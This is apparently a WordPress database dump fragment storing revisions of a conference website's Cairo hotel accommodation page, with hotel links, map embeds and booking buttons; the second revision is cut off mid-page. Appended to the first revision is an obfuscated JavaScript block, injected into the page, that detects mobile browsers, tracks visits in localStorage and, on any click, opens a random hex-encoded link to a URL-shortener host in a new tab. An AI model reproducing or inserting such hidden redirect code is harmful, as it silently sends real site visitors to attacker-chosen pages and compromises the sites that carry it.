href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<strong><span style=\"font-size: 12pt; color: #0000ff;\"> </span></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-15 16:42:37','2023-08-15 16:42:37','',2685,'https://gsw2023.com/?p=5200',0,'revision','',0),
(5201,1,'2023-08-15 16:46:59','2023-08-15 16:46:59','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower 